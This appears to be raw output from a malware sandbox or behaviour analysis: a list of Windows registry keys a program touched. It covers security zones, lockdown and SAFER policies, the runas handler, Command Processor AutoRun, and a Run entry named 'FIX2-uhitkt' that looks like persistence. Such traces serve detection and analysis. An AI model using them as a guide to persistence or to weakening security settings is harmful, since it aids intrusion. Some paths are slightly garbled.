HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2280033686-3172497658-3481507381-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2280033686-3172497658-34815073811000\ProfileImagePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas
HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DropTarget
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\FIX2-uhitkt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_CLASSES_ROOT\.adp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET EXPLORER\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wsmprovhost.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wsmprovhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET EXPLORER\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\wsmprovhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET EXPLORER\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\IsolatedCommand
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\WMIC.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\ABB0EA2
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Tahoma
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\wsmprovhost_RASMANCS
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B-7984CC409A1F}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B7984CC409A1F}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B7984CC409A1F}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B7984CC409A1F}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B-7984CC409A1F}\fe-5400-3f-32-f9
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-2280033686-3172497658-3481507381-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Namespaces
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Classes\AppID\WMIC.exe
HKEY_LOCAL_MACHINE\Software\Classes\AppID\WMIC.exe
